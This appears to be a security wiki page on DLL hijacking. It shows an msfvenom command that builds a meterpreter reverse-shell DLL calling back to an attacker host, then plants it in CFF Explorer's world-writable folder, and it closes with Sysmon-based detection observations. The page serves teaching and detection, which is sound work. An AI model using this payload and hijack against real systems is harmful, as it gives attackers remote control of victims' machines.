
# DLL Hijacking

## Execution

Generating a DLL that will be loaded and executed by a vulnerable program and that connects back to the attacking system with a meterpreter shell:

{% code title="attacker\@kali" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll
```

{% endcode %}

To illustrate this attack, we will exploit our beloved tool `CFF Explorer.exe`. Once the program is executed, it attempts to load `CFF ExplorerENU.dll` from the directory the program is installed in; however, that DLL cannot be loaded (note the NAME NOT FOUND) because it does not exist in that path:

![](/files/-LIRknY3zb0_MxOLj0NX)

Luckily for the attacker, the directory in which the DLL is being looked for is world writable! Let's move our evil DLL `evil-meterpreter64.dll` to `C:\Program Files\NTCore\Explorer Suite` and rename it to `CFF ExplorerENU.dll`:

![](/files/-LIRmJl9V1yeo6QOGAr-)

Launching the program again gives different results: the DLL is now found (SUCCESS):

![](/files/-LIRmfQYhm8047M_0XQh)

This is good news for the attacker: the DLL code gets executed, which gives the attacker a meterpreter shell:

![](/files/-LIRmrmNBNKw7BSTVo_K)

## Observations

On the victim system, we can only see `rundll32.exe` with no associated parent process and an established network connection. This should raise your suspicion immediately:

![](/files/-LIRn5zzPhyA14bHGTe0)

Looking at the rundll32 image info, we can see its current directory (the application's install folder), which is helpful:

![](/files/-LIRnVNGX3_GHnHxOxkS)

Looking at the Sysmon logs gives us a better understanding of what happened: `CFF Explorer.exe` was started as process `4856`, which then kicked off `rundll32.exe` (`1872`), which in turn established a connection to 10.0.0.5:

![](/files/-LIRpIVuFbSrV3YO9f0h)

## References

{% embed url="https://attack.mitre.org/wiki/Technique/T1038" %}

{% embed url="https://pentestlab.blog/2017/03/27/dll-hijacking/" %}

